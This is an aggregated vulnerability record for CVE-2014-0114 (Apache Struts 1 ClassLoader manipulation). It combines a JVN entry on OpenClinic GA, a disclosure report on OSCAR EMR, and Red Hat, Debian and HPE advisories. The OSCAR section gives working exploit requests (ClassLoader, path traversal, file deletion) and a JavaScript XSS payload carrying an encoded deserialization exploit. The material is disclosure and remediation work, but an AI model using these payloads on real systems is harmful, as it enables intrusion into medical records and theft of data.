ID

VAR-201404-0288


CVE

CVE-2014-0114


TITLE

OpenClinic GA  Multiple vulnerabilities in

Trust: 0.8

sources: JVNDB: JVNDB-2020-006468

DESCRIPTION

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. An information management system for hospitals that can manage data such as financial management, clinical practice, and pharmacies. OpenClinic GA There are multiple vulnerabilities in. OpenClinic GA The following vulnerabilities exist in. * Avoid authentication via another path or channel (CWE-288) - CVE-2020-14485* Inappropriate restriction of excessive authentication attempts (CWE-307) - CVE-2020-14484* Improper authentication (CWE-287) - CVE-2020-14494* Lack of certification (CWE-862) - CVE-2020-14491* Execution with unnecessary privileges (CWE-250) - CVE-2020-14493* Unlimited upload of dangerous types of files (CWE-434) - CVE-2020-14488* Path traversal (CWE-22) - CVE-2020-14490* Inappropriate authorization process (CWE-285) - CVE-2020-14486* Cross-site scripting (CWE-79) - CVE-2020-14492* Use of unmaintained third-party products (CWE-1104) - CVE-2020-14495 , CVE-2016-1181 , CVE-2016-1182 Due to * Inadequate protection of credentials (CWE-522) - CVE-2020-14489* Hidden features (CWE-912) - CVE-2020-14487 * However, this vulnerability is Version 5.89.05b Does not affectThe expected impact depends on each vulnerability, but it may be affected as follows. * A remote attacker initiates a session by bypassing client-side access control or sending a specially crafted request. SQL Performs administrator functions such as query execution - CVE-2020-14485* A remote attacker bypasses the system's account lock feature and brute force attacks ( Brute force attack ) Is executed - CVE-2020-14484* In this system, brute force attack ( Brute force attack ) Insufficient protection mechanism allows an unauthenticated attacker to access the system with more than the maximum number of attempts. - CVE-2020-14494* The system SQL Since it does not check the execution permission of the query, a user with lower permission can access information that requires higher permission. - CVE-2020-14491* In this system, with relatively low authority SQL It is possible to write any file by executing, and as a result, any command is executed on the system. - CVE-2020-14493* The system does not properly validate uploaded files, so a low-privileged attacker uploads and executes arbitrary files on the system. - CVE-2020-14488* Executing a file that contains any local file specified by a parameter exposes sensitive information or executes an uploaded malicious file. - CVE-2020-14490* By avoiding the redirect process that is executed when authentication fails, an unauthenticated attacker can execute a command illegally. - CVE-2020-14486* Malicious code is executed on the user's browser because the user's input value is not properly validated. - CVE-2020-14492* Known vulnerabilities in end-of-support third-party software used by the system (CVE-2014-0114 , CVE-2016-1181 , CVE-2016-1182) Malicious code executed by a remote attacker due to * There is a flaw in the hashing process when saving the password, and the password is stolen by a dictionary attack. - CVE-2020-14489* A user account set by default exists in the system in an accessible state, and an attacker can use that account to execute arbitrary commands. - CVE-2020-14487. Description: Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint, flexible, open source enterprise service bus and integration platform. (CVE-2014-0114) Refer to the readme.txt file included with the patch files for installation instructions. Solution: The References section of this erratum contains a download link (you must log in to download the update). For the stable distribution (wheezy), this problem has been fixed in version 1.2.9-5+deb7u1. For the unstable distribution (sid), this problem has been fixed in version 1.2.9-9. We recommend that you upgrade your libstruts1.2-java packages. Title: Multiple vulnerabilities in OSCAR EMR Product: OSCAR EMR Vendor: Oscar McMaster Tested version: 15.21beta361 Remediation status: Unknown Reported by: Brian D. Hysell ----- Product Description: "OSCAR is open-source Electronic Medical Record (EMR) software that was first developed at McMaster University by Dr. David Chan. It is continuously enriched by contributions from OSCAR users and the Charter OSCAR Service Providers that support them. OSCAR has been certified by OntarioMD, and verified as IHE compliant, achievements made possible by the creation and success of OSCAR EMRas ISO 13485:2003 certified Quality Management System." ----- Timeline: 29 Mar 2016 - Vendor contacted 29 Mar 2016 - Vendor responded 29 Apr 2016 - Vendor contacted for permission to share redacted report with third party 02 May 2016 - Vendor responded 17 Jan 2017 - Lead developer contacted (no response) 01 Jul 2018 - Vendor and lead developer contacted for follow-up, informed of intended 15 Aug disclosure (no response) 12 Aug 2018 - Alternate email address attempted for lead developer (no response) 15 Aug 2018 - Vulnerabilities publicly disclosed ----- Contents: This report uses OVE identifiers: http://www.openwall.com/ove/ OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency OVE-20160329-0003: Remote code execution via unsafe object deserialization OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface OVE-20160329-0007: SQL injection OVE-20160329-0008: Path traversal OVE-20160329-0002: Insecure direct object reference in document manager OVE-20160329-0005: Denial of service via resource exhaustion OVE-20160329-0006: Insecure password storage OVE-20160329-0009: Cross-site request forgery ----- Issue details: === OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency === OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to CVE-2014-0114. An authenticated user can issue the following request with different / omitted cookie headers: /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster Consequently, he or she can access (using a valid session cookie), e.g., /oscar/OscarBackup.sql.gz An unauthenticated attacker is prevented from doing likewise by the aLoginFiltera servlet filter, but can still carry out a denial-of-service attack impeding any access to the application until Tomcat is restarted by issuing a request like the following: /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid === OVE-20160329-0003: Remote code execution via unsafe object deserialization === TraceabilityReportProcessor deserializes user-provided data, allowing remote code execution given the presence of known-vulnerable libraries in the classpath such as ROME 1.0. This functionality is only available to administrators but can be exploited via XSS (OVE-20160329-0004) or CSRF (issue 9) using a payload generated with ysoserial. In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is inaccessible due to the following exception aorg.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'oscarSecurityManager' is defineda, but were it to be accessible, it would be vulnerable as well. === OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface === logReport.jsp, in general, does not escape data it outputs to the page; in particular, on line 283, prop.getProperty("contentId") is printed unescaped. As a result, if an attacker includes Javascript in his or her username during a login attempt, it will be executed if an administrator views the Security Log Report for that timeframe. The text printed in the "Keyword" column is cut off at 80 characters, but that is more than enough to load an externally-hosted script, such as the following script exploiting the deserialization RCE OVE-20160329-0003: var decodedBase64 = atob("H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA=="); var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); for(var i = 0; i < binaryArray.length; i++) { binaryArray[i] = decodedBase64.charCodeAt(i); } var payload = new Blob([binaryArray], {type: "application/x-gzip"}); var formData = new FormData(); formData.append("file", payload); formData.append("submit", "Generate"); var xhr = new XMLHttpRequest(); xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do"); xhr.send(formData); XSS was not a focus of this test; other confirmed or likely XSS vulnerabilities are: * Reflected XSS through the errormsg parameter in loginfailed.jsp * Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp * Reflected XSS through the noteId parameter, line 1562 in CaseManagementViewAction (untested) * Reflected XSS through the pdfName parameter when an exception has been thrown, line 1174 in ManageDocumentAction (untested) * Reflected XSS through the pharmaName and pharmaFax parameters, line 149 in FrmCustomedPDFServlet (untested) * Reflected XSS through the id and followupValue parameters, line 81 in EctAddShortMeasurementAction (untested) === OVE-20160329-0007: SQL injection === On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is concatenated into an SQL statement rather than parameterized; likewise the content parameter on lines 217, 223, and 229 of admin/logReport.jsp. In both cases these errors result in error-based SQL injection vulnerabilities; the former allows authenticated users with access to oscarMDS/PatientSearch.jsp to access information beyond their privilege levels while the latter is accessible only to administrators. === OVE-20160329-0008: Path traversal === ImportLogDownloadAction reads and outputs an arbitrary absolute file path provided by the user; DelImageAction deletes a user-specified filename without accounting for the possibility of relative path traversal (i.e., the inclusion of "../" in the filename). Any authenticated user can exploit the former issue to steal files from the system, e.g., /oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz An authenticated user with access to eforms can delete files writeable by the Tomcat user, e.g., /oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp === OVE-20160329-0002: Insecure direct object reference in document manager === ManageDocumentAction.display() does not check the permissions associated with the requested document ID (doc_no) before providing it to the requesting user. Given /oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a user with access to the document management interface can view arbitrary documents by incrementing or decrementing X, regardless of whether they have been marked private. === OVE-20160329-0005: Denial of service via resource exhaustion === uploadSignature.jsp, which is accessible to and operable by unauthenticated users, saves uploaded files to a temporary directory but never deletes them. An attacker can upload many junk files and eventually consume all disk space available to the /tmp directory, impeding access to the application depending on the functionality in question and the partition layout of the host system (the effects are crippling and pervasive if /tmp is on the same partition as /; they are much less so if /tmp is on a separate partition). === OVE-20160329-0006: Insecure password storage === Passwords are stored as SHA-1 hashes; unless unusually complex, passwords stored in that manner are typically easily recoverable with a tool such as oclHashcat. In OSCAR each hash is stored as a string of decimal numbers, rather than hexadecimal or raw bytes. This somewhat non-traditional representation adds a bit of programming work to the cracking process, but does not represent a major impediment to attack. === OVE-20160329-0009: Cross-site request forgery === The application lacks protection against cross-site request forgery attacks. A CSRF attack could be used against an administrator to exploit the deserialization RCE in a manner similar to the example provided with OVE-20160329-0004. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: struts security update Advisory ID: RHSA-2014:0474-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0474.html Issue date: 2014-05-07 CVE Names: CVE-2014-0114 ===================================================================== 1. Summary: Updated struts packages that fix one security issue are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: RHEL Desktop Workstation (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64 3. Description: Apache Struts is a framework for building web applications with Java. A remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions. (CVE-2014-0114) All struts users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using struts must be restarted for this update to take effect. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters 6. Package List: RHEL Desktop Workstation (v. 5 client): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm i386: struts-1.2.9-4jpp.8.el5_10.i386.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm struts-manual-1.2.9-4jpp.8.el5_10.i386.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm x86_64: struts-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm Red Hat Enterprise Linux (v. 5 server): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm i386: struts-1.2.9-4jpp.8.el5_10.i386.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm struts-manual-1.2.9-4jpp.8.el5_10.i386.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm ia64: struts-1.2.9-4jpp.8.el5_10.ia64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.ia64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.ia64.rpm struts-manual-1.2.9-4jpp.8.el5_10.ia64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ia64.rpm ppc: struts-1.2.9-4jpp.8.el5_10.ppc.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.ppc.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.ppc.rpm struts-manual-1.2.9-4jpp.8.el5_10.ppc.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ppc.rpm s390x: struts-1.2.9-4jpp.8.el5_10.s390x.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.s390x.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.s390x.rpm struts-manual-1.2.9-4jpp.8.el5_10.s390x.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.s390x.rpm x86_64: struts-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0114.html https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFTacDGXlSAg2UNWIIRAhvbAJ0Za5jRat54AcgbIdHKlzbZN1y1hACcC8DR HJqJt2S278nXdfwLyGc7EJQ= =qMuX -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c05324755 Version: 1 HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2016-11-04 Last Updated: 2016-11-04 Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS) Source: Hewlett Packard Enterprise, Product Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been identified in HPE SiteScope. The vulnerabilities could be exploited to allow local elevation of privilege and exploited remotely to allow denial of service, arbitrary code execution, cross-site request forgery. References: - CVE-2014-0114 - Apache Struts, execution of arbitrary code - CVE-2016-0763 - Apache Tomcat, denial of service (DoS) - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions - CVE-2015-3253 - Apache Groovy, execution of arbitrary code - CVE-2015-5652 - Python, elevation of privilege - CVE-2013-6429 - Spring Framework, cross-site request forgery - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS) - PSRT110264 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - HP SiteScope Monitors Software Series 11.2xa11.32IP1 BACKGROUND CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector CVE-2013-6429 6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) CVE-2014-0050 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2014-0107 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2014-0114 6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2015-3253 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2015-5652 8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C) CVE-2016-0763 6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Information on CVSS is documented in HPE Customer Notice HPSN-2008-002 here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499 RESOLUTION HPE has provided a resolution via an update to HPE SiteScope. Details on the update and each vulnerability are in the KM articles below. **Note:** The resolution for each vulnerability listed is to upgrade to SiteScope 11.32IP2 or an even more recent version of SiteScope if available. The SiteScope update can be can found in the personal zone in "my updates" in HPE Software Support Online: <https://softwaresupport.hpe.com>. * Apache Commons FileUpload: KM02550251 (CVE-2014-0050): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02550251> * Apache Struts: KM02553983 (CVE-2014-0114): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553983> * Apache Tomcat: KM02553990 (CVE-2016-0763): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553990> * Apache XML Xalan: KM02553991 (CVE-2014-0107): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553991> * Apache Groovy: KM02553992 (CVE-2015-3253): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553992> * Python: KM02553997 (CVE-2015-5652): * <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553997> * Spring Framework: KM02553998 (CVE-2013-6429): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553998> HISTORY Version:1 (rev.1) - 4 November 2016 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com. Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2016 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. References: CVE-2014-0114, SSRT101566 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Mitigation information for the Apache Struts vulnerability (CVE-2014-0114) is available at the following location: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-a pplications/ba-p/6463188#.U2J7xeaSxro Japanese information is available at the following location: http://www.hp.com/jp/icewall_patchaccess Note: The HP IceWall product is only available in Japan. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein

Trust: 3.06

sources: NVD: CVE-2014-0114 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // VULMON: CVE-2014-0114 // PACKETSTORM: 126618 // PACKETSTORM: 127957 // PACKETSTORM: 149050 // PACKETSTORM: 126525 // PACKETSTORM: 128873 // PACKETSTORM: 139721 // PACKETSTORM: 126811

AFFECTED PRODUCTS

vendor:apachemodel:strutsscope:eqversion:1.2.2

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.3.8

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.2.7

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.2.4

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.2.9

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.3.10

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.1

Trust: 1.0

vendor:apachemodel:commons beanutilsscope:lteversion:1.9.1

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.2.6

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.3.5

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.2.8

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.0.2

Trust: 1.0

vendor:apachemodel:strutsscope:eqversion:1.0

Trust: 1.0

vendor:openclinic gamodel:openclinic gascope:eqversion: -

Trust: 0.8

vendor:openclinic gamodel:openclinic gascope:eqversion:version 5.09.02

Trust: 0.8

vendor:openclinic gamodel:openclinic gascope:eqversion:version 5.89.05b

Trust: 0.8

vendor:apachemodel:strutsscope:eqversion:1.x to 1.3.10

Trust: 0.8

vendor:富士通model:クラウド インフラ マネージメント ソフトウェアscope: - version: -

Trust: 0.8

vendor:富士通model:fujitsu integrated system ha database readyscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:business analytics modeling server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:business process manager analytics

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:mobile manager

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:extreme transaction processing server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:navigator explorer server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:application development cycle manager

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:application framework suite

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:application server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:apworks

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:business application server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:job workload server

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:service integrator

Trust: 0.8

vendor:富士通model:interstagescope:eqversion:studio

Trust: 0.8

vendor:富士通model:interstage application development cycle managerscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage application framework suitescope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage application serverscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage apworksscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage business application serverscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage job workload serverscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage service integratorscope:eqversion: -

Trust: 0.8

vendor:富士通model:interstage studioscope:eqversion: -

Trust: 0.8

vendor:富士通model:serverviewscope:eqversion:resource orchestrator

Trust: 0.8

vendor:富士通model:symfowarescope:eqversion:analytics server

Trust: 0.8

vendor:富士通model:symfowarescope:eqversion:server

Trust: 0.8

vendor:富士通model:systemwalker service catalog managerscope:eqversion: -

Trust: 0.8

vendor:富士通model:systemwalker service quality coordinatorscope:eqversion: -

Trust: 0.8

vendor:富士通model:systemwalker software configuration managerscope:eqversion: -

Trust: 0.8

vendor:富士通model:triolescope:eqversion:cloud middle set b set

Trust: 0.8

vendor:日立model:hitachi device managerscope:eqversion:software

Trust: 0.8

vendor:日立model:hitachi global link managerscope:eqversion:software

Trust: 0.8

vendor:日立model:job management partner 1/performance management - web consolescope:eqversion: -

Trust: 0.8

vendor:日立model:jp1/performance managementscope:eqversion:- manager web option

Trust: 0.8

vendor:日立model:jp1/performance managementscope:eqversion:- web console

Trust: 0.8

vendor:日立model:hitachi replication managerscope:eqversion:software

Trust: 0.8

vendor:日立model:hitachi tiered storage managerscope:eqversion:software

Trust: 0.8

vendor:日立model:hitachi tuning managerscope:eqversion:software

Trust: 0.8

vendor:ヒューレット パッカードmodel:hp device managerscope:eqversion: -

Trust: 0.8

vendor:ヒューレット パッカードmodel:hp xp7scope:eqversion:global link manager software

Trust: 0.8

vendor:ヒューレット パッカードmodel:hp xp p9000scope:eqversion:replication manager

Trust: 0.8

vendor:ヒューレット パッカードmodel:hp xp p9000scope:eqversion:tiered storage manager

Trust: 0.8

vendor:ibmmodel:connectionsscope:eqversion:5.0

Trust: 0.8

vendor:ibmmodel:connectionsscope:eqversion:4.5

Trust: 0.8

vendor:ibmmodel:connectionsscope:eqversion:4.0

Trust: 0.8

vendor:ibmmodel:connectionsscope:lteversion:3.0.1.1

Trust: 0.8

vendor:ibmmodel:content collectorscope:eqversion:2.2

Trust: 0.8

vendor:ibmmodel:lotus expeditorscope:eqversion:6.1.x

Trust: 0.8

vendor:ibmmodel:lotus expeditorscope:eqversion:6.2.x

Trust: 0.8

vendor:ibmmodel:lotus mashupsscope:eqversion:2.0.0.2

Trust: 0.8

vendor:ibmmodel:lotus mashupsscope:eqversion:3.0.0.1

Trust: 0.8

vendor:ibmmodel:lotus quickrscope:eqversion:8.5 for websphere portal

Trust: 0.8

vendor:ibmmodel:rational changescope:eqversion:5.2

Trust: 0.8

vendor:ibmmodel:rational changescope:eqversion:5.3

Trust: 0.8

vendor:ibmmodel:rational changescope:eqversion:5.3.1

Trust: 0.8

vendor:ibmmodel:websphere portalscope:eqversion:8.5

Trust: 0.8

vendor:ibmmodel:websphere portalscope:eqversion:8.0

Trust: 0.8

vendor:ibmmodel:websphere portalscope:eqversion:7

Trust: 0.8

vendor:ibmmodel:websphere portalscope:eqversion:6.1.x

Trust: 0.8

vendor:日本電気model:esmpro/servermanagerscope:lteversion:ver5.75

Trust: 0.8

vendor:日本電気model:infocagescope:eqversion:pc security

Trust: 0.8

